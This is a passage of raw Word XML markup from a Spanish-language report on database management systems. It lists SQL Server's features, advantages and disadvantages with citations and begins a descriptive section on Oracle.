          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Incluye también un potente entorno gráfico de administración, que permite el uso de comandos DDL y DML gráficamente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Escalabilidad, estabilidad y seguridad</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Permite trabajar en modo cliente-servidor donde la información y datos se alojan en el servidor y las terminales o clientes de la red solo acceden a la información.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Soporta procedimientos almacenados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Además permite administrar información de otros servidores de datos</w:t>
      </w:r>
      <w:r w:rsidR="00D168BF">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1383941975"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00D168BF">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00D168BF">
            <w:instrText xml:space="preserve"> CITATION San18 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidR="00D168BF">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Santamaria, José &amp; Hernández, Javier, 2018)</w:t>
          </w:r>
          <w:r w:rsidR="00D168BF">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00BD5F4E">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ventajas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Soporte de transacciones.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Escalabilidad, estabilidad y seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Soporta procedimientos almacenados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Es un sistema de gestión de base de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SQL permite administrar permisos a todo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Es útil para manejar y obtener datos de la red.</w:t>
      </w:r>
      <w:r w:rsidR="00D168BF" w:rsidRPr="00D168BF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1746877167"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00D168BF">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00D168BF">
            <w:instrText xml:space="preserve"> CITATION SQL18 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidR="00D168BF">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(SQL Server, 2018)</w:t>
          </w:r>
          <w:r w:rsidR="00D168BF">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Desventajas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Utiliza una enorme cantidad de memoria RAM que emplea tanto en instalación como en utilización del software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tiene restricciones en lo particular.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La relación calidad-precio está muy debajo comparado con otros.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tiene muchos bloqueos a nivel de página, un tamaño de página fijo y demasiado pequeño una pésima implementación de los tipos de datos variables.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="00000A"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:id w:val="-94632132"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="00F7769F">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00F7769F">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION SQL18 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00F7769F">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:noProof/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="009E53AE" w:rsidRPr="009E53AE">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:noProof/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t>(SQL Server, 2018)</w:t>
          </w:r>
          <w:r w:rsidRPr="00F7769F">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="00000A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD5F4E" w:rsidRPr="00F7769F" w:rsidRDefault="00BD5F4E" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251680768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="692B582C" wp14:editId="3EE271D7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>756977</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>478155</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3678865" cy="726768"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1" name="Imagen 1" descr="Resultado de imagen para oracle  definiciÃ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oracle  definiciÃ³n"/>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78865" cy="726768"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="005C10C0" w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>ORACLE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00C64A6E" w:rsidP="00C64A6E">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F7769F" w:rsidRPr="00F7769F">
        <w:t>Oracle la primera base de datos diseñada para Grid Computing, es un sistema de gestión de base de datos relacional fabricado por Oracle Corporation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C64A6E" w:rsidRDefault="00C64A6E" w:rsidP="00C64A6E"/>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00C64A6E" w:rsidP="00C64A6E">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F7769F" w:rsidRPr="00F7769F">
        <w:t>Oracle es básicamente una herramienta cliente/servidor para la gestión de base de datos la gran potencia que tiene y su elevado precio hace que solo se vea en empresas muy grandes y multinacionales, por norma general.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C64A6E" w:rsidRDefault="00C64A6E" w:rsidP="00C64A6E"/>
    <w:p w:rsidR="00F7769F" w:rsidRDefault="00C64A6E" w:rsidP="00C64A6E">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F7769F" w:rsidRPr="00F7769F">
        <w:t xml:space="preserve">Oracle Corporation es una de las mayores compañías de software del mundo. Sus productos van desde bases de datos (Oracle) hasta sistemas de gestión. Cuenta además, con herramientas propias de desarrollo para realizar potentes aplicaciones, como Oracle Designer. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C64A6E" w:rsidRDefault="00C64A6E" w:rsidP="00C64A6E"/>
    <w:p w:rsidR="00C64A6E" w:rsidRPr="00F7769F" w:rsidRDefault="00C64A6E" w:rsidP="00C64A6E"/>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00F7769F">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Características:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Modelo relacional: los usuarios visualizan los datos en tablas con el formato filas/columnas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Herramienta de administración gráfica intuitiva y cómoda de utilizar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7769F">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Control de acceso: tecnologías avanzadas para vigilar la entrada a los datos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F7769F" w:rsidRPr="00F7769F" w:rsidRDefault="00F7769F" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
